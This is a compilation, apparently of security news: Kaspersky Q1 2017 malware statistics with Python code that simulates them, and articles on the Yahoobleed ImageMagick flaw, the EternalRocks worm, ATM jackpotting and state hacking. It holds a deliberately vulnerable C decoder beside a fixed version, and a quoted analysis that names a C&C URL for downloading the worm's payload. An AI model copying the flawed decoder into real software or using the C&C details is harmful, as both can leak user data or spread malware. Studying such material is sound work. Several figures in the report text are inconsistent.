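SAMPLE_SPEC = {
    "AA": (20_000, {
        "Trojan-Spy.Win32.Zbot": 200,
        "Trojan.Win32.Nymaim": 100,
        "Trojan-Banker.Win32.Gozi": 40,
        ("Trojan-Spy.Win32.Zbot", "Trojan-Banker.Win32.Gozi"): 10,
    }),
    "BB": (12_000, {"Trojan-Spy.Win32.Zbot": 90, "Trojan.Win32.Nymaim": 30}),
    "CC": (500, {"Trojan-Spy.Win32.Zbot": 50}),  # too few users: excluded from ranking
}


def build_sample_telemetry(spec=SAMPLE_SPEC):
    """Expand the spec into (user_id, country, frozenset_of_families) records."""
    records = []
    for country, (total, groups) in spec.items():
        attacked = 0
        for key, count in groups.items():
            families = frozenset(key if isinstance(key, tuple) else (key,))
            for _ in range(count):
                records.append((len(records), country, families))
            attacked += count
        for _ in range(total - attacked):  # remaining users saw nothing
            records.append((len(records), country, frozenset()))
    return records


def country_attack_rates(records, min_users=MIN_USERS_PER_COUNTRY):
    """% of a country's users that were attacked at least once.

    A user hit by several families counts once here (unique users), and
    countries below the user threshold are dropped, as in the report footnotes.
    """
    total = defaultdict(int)
    attacked = defaultdict(int)
    for _, country, families in records:
        total[country] += 1
        if families:
            attacked[country] += 1
    return {c: round(100 * attacked[c] / total[c], 2)
            for c in total if total[c] >= min_users}


def family_shares(records):
    """% of all attacked users that met each family.

    The denominator is attacked users worldwide, so the per-family figures
    can sum to more than 100% when users are hit by several families.
    """
    attacked = [families for _, _, families in records if families]
    seen_by = defaultdict(int)
    for families in attacked:
        for fam in families:
            seen_by[fam] += 1
    return {fam: round(100 * n / len(attacked), 2) for fam, n in seen_by.items()}


def top_countries(rates, n=10):
    """Rank countries by attack rate, highest first."""
    return sorted(rates.items(), key=lambda kv: kv[1], reverse=True)[:n]


if __name__ == "__main__":
    recs = build_sample_telemetry()
    for country, pct in top_countries(country_attack_rates(recs)):
        print(f"{country}: {pct}% of users attacked")
    for fam, pct in sorted(family_shares(recs).items(), key=lambda kv: -kv[1]):
        print(f"{fam}: {pct}% of attacked users")
```

With the constructed data, country CC has the highest raw rate (50 of 500 users) but never appears in the ranking, which is exactly what the 10,000-user cut-off is for: a handful of infections in a tiny install base would otherwise dominate the table.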

As last year, Trojan-Spy.Win32.Zbot (45.93%) topped the rating of the most popular malware families in Q1 2017. Its source code has been publicly available since it was leaked and is now widely used as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating: cybercriminals regularly extend the family with new modifications compiled from the source code that differ only slightly from the original.

Second came Trojan.Win32.Nymaim (29.70%). The first modifications of malware belonging to this Trojan family were downloaders, which blocked the infected machine with the help of downloaded programs unique to each country. Later, new modifications of the Trojan.Win32.Nymaim family were discovered. They included a fragment of Gozi used by cybercriminals to steal user payment data in online banking systems. In Q1 2017, Gozi (3.15%) was in 4th position in the rating.

Trojan.Win32.Neurevt (3.31%) rounded off the Top 3. It is a multifunctional Trojan written in C++. It uses rootkit techniques to conceal its presence in the system, injects its own code into all running processes, interferes with some anti-virus programs, and can monitor and block the installation of other common Trojans.

Ransomware Trojans

A total of 11 new cryptor families and 55,679 new modifications were detected in Q1 2017.
 

The number of newly created cryptor modifications, Q2 2016 – Q1 2017

Most of detected modifications belonged to the Cerber family (the Trojan-Ransom.Win32.Zerber verdict). This cryptor, first discovered a year ago, continues to evolve, and we regularly detect its new improved versions.

The number of users attacked by ransomware

In Q1 2017, 240,799 unique KSN users were attacked by cryptors.

 

Number of unique users attacked by Trojan-Ransom cryptor malware (Q1 2017)

This figure is almost half that of the fourth quarter of 2016, but one should not take it as a receding threat. The difference is most likely a matter of methodology, while the actual number of incidents is higher: the statistics only reflect the results of signature-based and heuristic detection, whereas most Trojan ransomware is detected by Kaspersky Lab products using behavioral methods, which issue a generic verdict that does not distinguish between types of malware.

The geography of attacks

 

Geography of Trojan-Ransom attacks in Q1 2017 (percentage of attacked users)

Top 10 countries attacked by cryptors

No. | Country* | % of users attacked by cryptors **
1 | Italy | 1.87%
2 | Brazil | 1.07%
3 | Japan | 0.99%
4 | Vietnam | 0.74%
5 | Netherlands | 0.73%
6 | Cambodia | 0.70%
7 | Uganda | 0.66%
8 | Philippines | 0.65%
9 | Venezuela | 0.63%
10 | Nigeria | 0.60%
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Italy, which was not in the Top 10 in the third quarter of 2016, now leads the Q1 ranking (1.87%). Second came Brazil (1.07%), a newcomer to the Top 10. This correlates with our observations, which indicate an increase in the number of ransomware Trojans targeting victims in Brazil. One example of such malicious software is Xpan, which we analyzed last year.

Japan (0.99%), which ranked first in the second and third quarters of 2016, moved two places down but still remains near the top of the rating.

Top 10 most widespread cryptor families

Rank  Name               Verdict*                        % of attacked users**
1     Cerber             Trojan-Ransom.Win32.Zerber      18.04%
2     Spora              Trojan-Ransom.Win32.Spora       7.59%
3     Locky              Trojan-Ransom.Win32.Locky       7.35%
4     Sage               Trojan-Ransom.Win32.SageCrypt   3.44%
5     Cryrar/ACCDFISA    Trojan-Ransom.Win32.Cryrar      3.20%
6     Shade              Trojan-Ransom.Win32.Shade       2.82%
7     (generic verdict)  Trojan-Ransom.Win32.Gen         2.37%
8     Crysis/Dharma      Trojan-Ransom.Win32.Crusis      2.30%
9     CryptoWall         Trojan-Ransom.Win32.Cryptodef   2.25%
10    (generic verdict)  Trojan-Ransom.Win32.Snocry      2.16%

* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

The Trojan Cerber (18.04%) was the most widespread by number of attacked users in the first quarter of 2017. This is no surprise, considering the huge number of modifications of this cryptor and its active distribution by fraudsters.

Spora (7.59%) came second. This new Trojan was first discovered in January 2017 and at the “dawn of its career” attacked only Russian-speaking victims. However, a few weeks after its detection Spora spread around the world, and by the end of the first quarter it had entered the top three most popular cryptors. Third place was occupied by Locky (7.35%), which appeared about a year ago and has recently reduced its activity a little.

Yet another new Trojan is Sage (3.44%). Like Spora, it emerged in the first quarter of 2017 and came fourth in the Q1 rating. The remaining places went to our “old acquaintances”, which appeared in the reports for previous quarters.

Of special note is the find of the quarter, the cryptor PetrWrap, which cybercriminals use for targeted attacks on organizations. Statistics show that this type of attack is gaining popularity.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2017, Kaspersky Lab solutions blocked 479,528,279 attacks launched from web resources located in 191 countries around the world. 79,209,775 unique URLs were recognized as malicious by web antivirus components.
 

Distribution of web attack sources by country, Q1 2017

The Netherlands (38%) took the lead in the number of web attack sources. The United States (30%), which had topped this rating for several quarters in a row, dropped to second place, although its share remained almost unchanged from its 2016 figures. Germany (9%) rounded off the Top 3.

Russia (4%) and France (3%) were fourth and fifth respectively.

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Country*      % of users attacked**
1     Algeria       37.67
2     Belarus       33.61
3     Tunisia       32.04
4     Ukraine       31.98
5     Kazakhstan    29.96
6     Azerbaijan    29.95
7     Albania       29.80
8     Bangladesh    29.51
9     Qatar         29.41
10    Armenia       29.02
11    Greece        28.21
12    Moldova       27.46
13    Venezuela     27.37
14    Kyrgyzstan    27.02
15    Vietnam       26.87
16    Russia        26.67
17    Morocco       25.65
18    Sri Lanka     25.42
19    Brazil        25.10
20    Serbia        24.18

These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.05% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

 

Geography of malicious web attacks in Q1 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Luxembourg (14.4%), Germany (13.9%), Norway (13.83%), South Africa (12.5%), the United States (10.56%), Uganda (10.29%) and Japan (9.18%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q1 2017, Kaspersky Lab’s file antivirus detected 174,989,956 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Rank  Country*       % of users attacked**
1     Yemen          54.84
2     Afghanistan    54.27
3     Uzbekistan     53.80
4     Tajikistan     51.32
5     Ethiopia       50.87
6     Djibouti       50.03
7     Algeria        49.38
8     Vietnam        49.15
9     Turkmenistan   48.39
10    Rwanda         47.57
11    Mongolia       47.25
12    Somalia        46.96
13    Syria          46.96
14    Bangladesh     46.64
15    Iraq           46.59
16    Sudan          46.35
17    Nepal          46.19
18    Kazakhstan     46.00
19    Laos           45.39
20    Belarus        43.45

These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 23.63% of computers globally faced at least one Malware-class local threat during the third quarter. Russia’s contribution to this rating accounted for 30.51%.

 

The safest countries in terms of local infection risks were: Poland (14.85%), Singapore (12.21%), Italy (13.30%), France (11.15%), Australia (10.51%), Great Britain (9.08%), Canada (8.66%), the Czech Republic (7.83%), the United States (7.57%), Denmark (6.35%), Japan (6.18%).


18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server
23.5.2017 thehackernews Hacking
After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermark and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++, and many other programming languages.
This popular image-processing library made headlines last year with the discovery of the then-zero-day vulnerability dubbed ImageTragick, which allowed hackers to execute malicious code on a web server by uploading a maliciously crafted image.
Now, just last week, security researcher Chris Evans demonstrated an 18-byte exploit to the public that could be used to cause Yahoo servers to leak other users' private Yahoo! Mail image attachments.
'Yahoobleed' Bug Leaks Images From Server Memory

The exploit abuses a security vulnerability in the ImageMagick library, which Evans dubbed "Yahoobleed #1" (YB1) because the flaw caused the service to bleed contents stored in server memory.
The vulnerability actually exists in the obscure RLE (Utah Raster Toolkit Run Length Encoded) image format.
To exploit the vulnerability, all an attacker needs to do is create a maliciously crafted RLE image containing a loop of empty RLE protocol commands and send it to the victim's email address, prompting the leakage of information.
To show how it is possible to compromise a Yahoo email account, Evans, as a proof-of-concept (PoC) demonstration, created a malicious image containing 18-byte exploit code and emailed it as an email attachment to himself.
Once the attachment reached Yahoo's email servers, ImageMagick processed the image to generate thumbnails and previews, but because of Evans' exploit code, the library generated a corrupt image preview for the attachment.
When this image attachment was clicked, it launched the image preview pane, causing the service to display portions of images that were still present in the server's memory instead of the original image.
"The resulting JPEG image served to my browser is based on uninitialized, or previously freed, memory content," Evans said.
Unlike Heartbleed and Cloudbleed, which were due to out-of-bounds server-side memory reads, Yahoobleed, Evans said, makes use of uninitialized or previously freed memory content.
"The previous bleed vulnerabilities have typically been out-of-bounds reads, but this one is the use of uninitialized memory," Evans said. "An uninitialized image decode buffer is used as the basis for an image rendered back to the client."
"This leaks server-side memory. This type of vulnerability is fairly stealthy compared to an out-of-bounds read because the server will never crash. However, the leaked secrets will be limited to those present in freed heap chunks."
Yahoo Retires 'Buggy' ImageMagick Library
After Evans had submitted his 18-byte exploit code to Yahoo, the company decided to retire the ImageMagick library altogether, rather than fixing the issue.
Evans also warned of another version of Yahoobleed, dubbed Yahoobleed2, which was due to Yahoo's failure to install a critical patch released in January 2015. He said the flaws combined could allow attackers to obtain browser cookies, authentication tokens, and private images belonging to Yahoo Mail users.
Evans was awarded a bug bounty payment of $14,000 -- $778 per byte of his exploit code -- by the tech giant, which decided to double the bounty to $28,000 after learning of Evans' intention to donate his reward to charity.
After Yahoo had been made aware of the issue, Evans reported the vulnerability to the ImageMagick team, who released ImageMagick version 7.0.5-1 two months ago with a fix for the issue.
Other widely used web services using the ImageMagick library are likely still vulnerable to the bug and are advised to apply the patches as soon as possible.


Yahoo Ditching ImageMagick Highlights Issues in Bug Responsibility Ecosystem

23.5.2017 securityweek Security
ImageMagick, an open source command line graphics file editor, has been retired by one of its major consumers: Yahoo. The product has been beset by flaws and bugs for several years, but this appears to have been one too many for Yahoo. Following discovery of a bleed vulnerability, Yahoo fixed it by retiring the product.

The flaw itself, discovered by researcher Chris Evans, was fixed by ImageMagick two months ago. Last week, however, he blogged about his discovery of its persistence at Yahoo. For Evans, it is symptomatic of a wider issue: vendor (ImageMagick) and consumer (in this case Yahoo) responsibility for upstream fixes.

ImageMagick fixed the problem (using Evans' own fix). Could or should it have done more to ensure that its consumers also applied that fix? Yahoo is (or was) a consumer. Could it or should it have done more to apply upstream fixes?

A solution, suggests Evans, is, "Probably less trivial than it sounds; both Box and Yahoo! appear to have been running old versions of ImageMagick with known vulnerabilities."

The vulnerability, exploited by Evans on Yahoo, provided "a way to slurp other users' private Yahoo! Mail image attachments from Yahoo servers." It was present in the RLE (Utah Raster Toolkit Run Length Encoded) image format. An attacker, writes Evans, "could simply create an RLE image that has header flags that do not request canvas initialization, followed by an empty list of RLE protocol commands. This will result in an uninitialized canvas being used as the result of the image decode."
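As an added illustration (not ImageMagick's code and not Evans' exploit), the toy decoder below models the bug class that Evans describes here and in the previous article: a header flag decides whether the output canvas is cleared, an empty command list leaves it untouched, and whatever a previously freed heap chunk still holds is served back as the "image". The hardened variant clears the canvas unconditionally. The one-byte header, the flag value, the (offset, value) command format and the helper names are all invented for this example.

```c
/* Toy model of the "Yahoobleed #1" bug class: a decoder that returns a canvas it
 * never initialised, so data left in a freed heap chunk leaks into the output.
 * Added example with an invented format; not ImageMagick's RLE coder. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define CANVAS_SIZE 16

/* Invented header flag: when set, the decoder clears the canvas before drawing
 * (plays the role of the "canvas initialization" request in the real format). */
#define HDR_FLAG_CLEAR_CANVAS 0x01

/* Deterministic stand-in for the heap: every allocation hands out the same
 * chunk, so what a "freed" buffer still contains is reproducible. */
static uint8_t g_heap_chunk[CANVAS_SIZE];

static uint8_t *toy_alloc(void) { return g_heap_chunk; }
static void toy_free(uint8_t *p) { (void)p; /* like free(): contents stay in place */ }

/* Simulates an earlier request that stored another user's data in the chunk. */
void previous_request_used_heap(const char *secret) {
    uint8_t *buf = toy_alloc();
    size_t n = strlen(secret);
    if (n > CANVAS_SIZE) n = CANVAS_SIZE;
    memset(buf, 0, CANVAS_SIZE);
    memcpy(buf, secret, n);
    toy_free(buf);
}

/* Applies the command list: pairs of (offset, value) following the header byte.
 * An empty list (len == 1) leaves the canvas exactly as the allocator gave it. */
static void apply_commands(uint8_t *canvas, const uint8_t *img, size_t len) {
    for (size_t i = 1; i + 1 < len; i += 2) {
        if (img[i] < CANVAS_SIZE) canvas[img[i]] = img[i + 1];
    }
}

/* Vulnerable: only clears the canvas when the file asks for it. */
uint8_t *decode_vulnerable(const uint8_t *img, size_t len) {
    if (len < 1) return NULL;
    uint8_t *canvas = toy_alloc();
    if (img[0] & HDR_FLAG_CLEAR_CANVAS) memset(canvas, 0, CANVAS_SIZE);
    apply_commands(canvas, img, len);
    return canvas;
}

/* Hardened: the canvas is always cleared; the file cannot opt out. */
uint8_t *decode_fixed(const uint8_t *img, size_t len) {
    if (len < 1) return NULL;
    uint8_t *canvas = toy_alloc();
    memset(canvas, 0, CANVAS_SIZE);
    apply_commands(canvas, img, len);
    return canvas;
}

/* Number of leading bytes of `secret` visible in the decoded canvas. */
size_t leaked_prefix_len(const uint8_t *canvas, const char *secret) {
    size_t n = 0;
    while (n < CANVAS_SIZE && secret[n] != '\0' && canvas[n] == (uint8_t)secret[n]) n++;
    return n;
}

int main(void) {
    const char secret[] = "other-user-jpeg";        /* constructed sample data */
    const uint8_t no_init_img[] = { 0x00 };          /* header: no clear, no commands */
    previous_request_used_heap(secret);
    printf("vulnerable decoder leaked %zu bytes\n",
           leaked_prefix_len(decode_vulnerable(no_init_img, 1), secret));
    previous_request_used_heap(secret);
    printf("fixed decoder leaked %zu bytes\n",
           leaked_prefix_len(decode_fixed(no_init_img, 1), secret));
    return 0;
}
```

The same class of defect is why Evans notes the server never crashes: nothing reads out of bounds, so neither ASan-style bounds checks nor crash monitoring will flag it, and the fix is to initialise every output buffer regardless of what the input requests.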

In his own POC he attached an 18-byte exploit file as a Yahoo! Mail attachment, sent it to himself and clicked on the image in the received mail to launch the image preview pane. "The resulting JPEG image served to my browser," he writes, "is based on uninitialized, or previously freed, memory content."

He reported the problem to Yahoo, and was pleased with Yahoo's response. It was fixed well within Yahoo's self-imposed 90-day deadline, and, he says, the communication was excellent. Compare this to his comments on communication with Box: "communications were painful, as if they were filtered through a gaggle of PR representatives and an encumbrance of lawyers."

The fix itself was simple and complete: Yahoo retired ImageMagick.

Despite its problems over the last few years, Yahoo has come a long way with improving its vulnerability response approach. In 2013, High-Tech Bridge (HTB) found numerous XSS flaws in Yahoo servers. "Each of the discovered vulnerabilities," it said at the time, "allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it."

The HTB researcher was offered a $12-50 Yahoo store voucher for each of the flaws. This time, however, Evans was offered a total of $14,000 for this and a separate issue yet to be documented. When Evans suggested donating it to charity, Yahoo doubled the charitable award to $28,000.

SecurityWeek has asked Yahoo for a comment on the issue, but has not yet received a reply.


Expert finds EternalRocks, a malware that uses 7 NSA Hacking Tools
23.5.2017 securityaffairs BigBrothers

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.

Stampar discovered EternalRocks after it infected his SMB honeypot; he initially called the malware ‘DoomsDayWorm’.

Miroslav Stampar (@stamparm), 3:44 AM - 18 May 2017: “If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95”
Stampar discovered that EternalRocks disguises itself as WannaCry, but instead of delivering ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.


Miroslav Stampar (@stamparm), 5:28 PM - 17 May 2017: “Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)”

Miroslav Stampar (@stamparm), 2:43 PM - 18 May 2017: “Info on (new) EternalRocks worm can be found on https://github.com/stamparm/EternalRocks/ …. Will keep it updated, along with @_jsoo_”

Unlike the WannaCry ransomware, which leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks uses seven exploits leaked by the Shadow Brokers, and its code does not include a kill-switch.

EternalRocks was developed to remain undetected on the target system; it uses the following NSA tools:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan
EternalRocks downloads all of the above SMB tools to the infected computer, then scans the Internet for open SMB ports on other systems to compromise.


Looking closely at the list, we find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.

DoublePulsar is the backdoor the malware uses to implement its network worm capabilities, while SMBTouch and ArchTouch are SMB reconnaissance tools designed to scan for systems with open SMB ports exposed on the Internet.

EternalRocks works in two stages:

During the first stage, EternalRocks downloads the Tor web browser on the affected computer, then uses it to connect to the command-and-control (C&C) server located on the Tor network.

The second stage starts after 24 hours; the malware delays its action in an attempt to evade sandbox analysis.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).” wrote the researcher.

“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.”


Europol arrested 27 for jackpotting attacks on ATMs across Europe
23.5.2017 securityweek CyberCrime

27 people have been arrested by Europol for jackpotting attacks on ATMs across many countries in Europe.
Europol has arrested 27 people accused of being involved in a series of successful black box attacks against ATMs across Europe. Since 2016, these attacks have resulted in more than €45 million in losses.

“The efforts of a number of EU Member States and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), culminated in the arrest of 27 individuals linked with so-called ATM “Black Box” attacks across Europe.” states Europol. “Perpetrators responsible for this new and sophisticated method of ATM jackpotting were identified in a number of countries over different periods of time in 2016 and 2017. There were arrests in Czech Republic (3), Estonia (4), France (11), the Netherlands (2), Romania (2), Spain (2) and Norway (3).”

The first attacks were observed in 2015, but the technique has been widely adopted by crooks since 2016.
“In a European ATM Crime Report covering 2016 EAST has reported that ATM black box attacks were up 287% when compared to 2015.” states the European ATM Security Team (EAST).

“A total of 58 such attacks were reported by ten countries, up from 15 attacks during 2015. ‘Black Box’ is the connection of an unauthorised device which sends dispense commands directly to the ATM cash dispenser in order to ‘cash-out’ the ATM. Related losses were down 39%, from €0.74 million to €0.45 million.”

The technique is very effective, it has been estimated that crooks have stolen €45 million using it since 2016.

The attack method was first reported by the notorious expert Barnaby Jack in 2010, the researcher coined the term jackpotting during the 2010 Black Hat conference.

The brute-force black box attack against an ATM starts by punching a hole into the machine’s casing, then the crooks connect a laptop to the exposed cables or ports and use it to issue commands to the ATM to dispense money.


The arrests were part of a still ongoing Europol operation conducted with law enforcement agencies of numerous European states. The details of the arrests are below:

Netherlands (2 people)
Romania (2 people)
Spain (2 people)
Norway (3 people)
Czech Republic (3 people)
Estonia (4 people)
France (11 people)
“Our joint efforts to tackle this new criminal phenomenon resulted in significant arrests across Europe. However the arrest of offenders is only one part of stopping this form of criminality. Increasingly we need to work closely with the ATM industry to design out vulnerabilities at source and prevent the crime taking place,” said Steven Wilson, Head of Europol’s European Cybercrime Centre.

The crooks that were involved in the jackpotting ATM Black Box attacks are mainly from countries in Eastern Europe, such as Romania, Moldova, Russia, and Ukraine.

Let me suggest reading an interesting post written by the security expert Brian Krebs, titled “Thieves Jackpot ATMs With ‘Black Box’ Attack”, that describes this kind of attack.


Hackers attacked the publisher of the US daily USA Today, putting the data of 18,000 employees at risk

23.5.2017 Novinky/Bezpečnost Hacking
One of the largest US newspaper publishers, Gannett Co., whose portfolio includes the daily USA Today, was attacked by hackers who obtained sensitive data on 18,000 current and former employees. The intrusion into the publisher's internal network came through a phishing message that the perpetrator sent to the company's human resources department, the WeLiveSecurity.com site reported.
The e-mail gave the impression that it came from a manager at the publisher who was requesting confirmation of network login credentials. The attackers then gained access to the company's employee database.

The second major attack after Gmail
In an official statement the publisher denied that there was even a hint of a leak of sensitive personal data. It will, however, subject the e-mail accounts of the employees whose data the attackers may have obtained to thorough checks. The attack reportedly took place as early as March 30, when the perpetrator attempted, through one of the compromised user accounts, to carry out a bank transfer, which failed.

The suspicious transaction was caught by the publisher's finance department, which initiated an extensive investigation. The incident came to light at the same time as the case of a similar attack on Gmail users was making waves.

According to the non-governmental organization Internet Society, companies like Gannett Co. should do a better job of preventing unauthorized persons from reaching sensitive data. “If they want to minimize the risk of data breaches and device intrusions, they must use the latest security systems and be aware of how to handle threats connected with social engineering,” said Olaf Kolkman, head of the Internet technology division at the Internet Society.

“Our 2016 report concluded that if US companies implemented appropriate measures, they could avoid up to 93 percent of all intrusions into their systems,” he added.

Czech companies may be at risk too
Leaks of sensitive personal and business data are, according to ESET security expert Václav Zubr, among the biggest cyber threats to companies as well as to various public institutions. “Many organizations fundamentally underestimate security measures. Very often they skip security training for their employees. Yet it is precisely the human factor that plays the main role in phishing attacks and social engineering,” Zubr said.

“Every company should hold mandatory Internet safety training for its employees at least once a year,” he adds.


Experts overseeing sanctions against North Korea are the target of hackers

23.5.2017 Novinky/Bezpečnost Viry
UN experts investigating violations of the sanctions imposed on North Korea are the target of cyber attacks by hackers with a very good overview of their work. The UN says so in an internal warning e-mail, the Reuters news agency wrote on Monday.
On May 8 hackers managed to break into the computer of one of the experts. “Along with a zip file (a data compression format), a very personal message was sent that shows the hackers have a very detailed overview of the committee's current investigative structure and its working methods,” Reuters quoted from the warning e-mail. It also stated that the committee monitoring the sanctions terms had been attacked in a similar way in 2016.

The fact that the computer of one committee member was breached was confirmed by the Italian mission to the UN. The warning e-mail says the committee is under constant cyber pressure from hackers.

The North Korean mission to the UN rejected responsibility for the hacker attack on the committee's experts, saying such accusations are ridiculous. North Korea also denied taking part in the recent attack with the WannaCry ransomware virus, which spread to more than 230,000 computers around the world. Security experts, however, found certain technical links in the WannaCry attack that point to North Korea.

WannaCry, both the first and the improved second generation, attacks in exactly the same way as other extortion viruses, collectively referred to as ransomware. First the malicious code penetrates the computer, then it locks it and encrypts all data. The cyber pirates then demand a ransom to make the data accessible again.


Unit 180: North Korea's cyber warfare strike force that frightens the West

23.5.2017 Novinky/Bezpečnost BigBrother
North Korea's main spy agency has a special cell called Unit 180, which is behind several of North Korea's (DPRK's) most daring and successful cyber attacks. Reuters reported this, citing North Korean defectors, officials and Internet security experts.
In recent years North Korea has been blamed for a series of online attacks, mostly on financial networks in the US, South Korea and more than a dozen other countries.

Investigators also said they had found technical evidence that may link North Korea to the recent WannaCry virus attack, which hit more than three hundred thousand computers in 150 countries. Pyongyang called the accusation “ridiculous”.

The basis of these accusations is North Korea's link to the Lazarus hacker group, which is associated with last year's cyber theft of 81 million dollars (almost two billion Czech crowns) from the Bangladesh central bank and with the attack on Sony's Hollywood studio.

The US government blamed North Korea for the attack on Sony, and according to some officials, investigators are preparing a case against Pyongyang in the Bangladesh bank affair. In neither case has any conclusive evidence been presented or official charges brought. North Korea has denied being behind either attack.

Abroad for a better Internet connection
North Korea is one of the most closed countries in the world, and any details about its secret operations are very difficult to obtain. Nevertheless, some clues are provided by experts who study the reclusive country and by North Koreans who have managed to get across the border to South Korea or the West.

One of them is former computer science professor Kim Heung-kwang, who defected to South Korea in 2004 and still has sources in North Korea. According to Kim, Pyongyang's cyber attacks were conducted to obtain money and were most likely organized by Unit 180, which is part of the Reconnaissance General Bureau, North Korea's intelligence and espionage agency.

“Unit 180 has been involved in hacking financial institutions, where it breaches security and withdraws money from bank accounts,” Kim told Reuters. He had previously said that one of his former students is in the Strategic Cyber Command, a sort of North Korean cyber army.

“The hackers go abroad to find better Internet connections than North Korea has, so as not to leave traces behind,” Kim added. According to him they work undercover as employees of trading companies.

According to James Lewis, a North Korea expert at the US Center for Strategic and International Studies, Pyongyang first used hacking as a tool for espionage and then for political provocations against South Korea and the United States.

Attack on a nuclear reactor
South Korean authorities say they have important evidence of North Korean cyber warfare operations. “North Korea carries out cyber attacks from third-world countries to hide the origin of these operations,” Ahn Chong-ghee, South Korea's vice foreign minister, told Reuters. Besides the attack on the Bangladesh bank, he said, Pyongyang is suspected of attacks on banks in the Philippines, Vietnam and Poland.

According to South Korean police, North Korea broke into more than 140,000 computers at 160 South Korean companies and government agencies and installed malicious code in them that is meant to lay the groundwork for a future massive cyber attack.

North Korea is also suspected of attacks on the operator of a South Korean nuclear reactor in 2014. North Korea has denied any involvement in the attacks.

According to Michael Madden, a US expert on the North Korean leadership, Unit 180 is one of many cyber warfare groups in the North Korean intelligence community.

“Personnel are recruited from secondary schools and trained at elite institutions,” Madden said. “They have a certain autonomy in their missions and tasking,” he added, noting that they may work from hotels in China or Eastern Europe, for example.


Symantec: WannaCry útočil od února. Pravděpodobně za ním stojí skupina Lazarus
23.5.2017 CNEWS.CZ Viry

Bezpečnostní firmy se snaží vypátrat původ ransomwaru WannaCry a nové informace nabídl Symantec. Ten na svém blogu shrnuje dosavadní zkušenosti s tímto škodlivým kódem. První útok firma zaznamenala 10. února tohoto roku, kdy byla napadena jediná organizace.

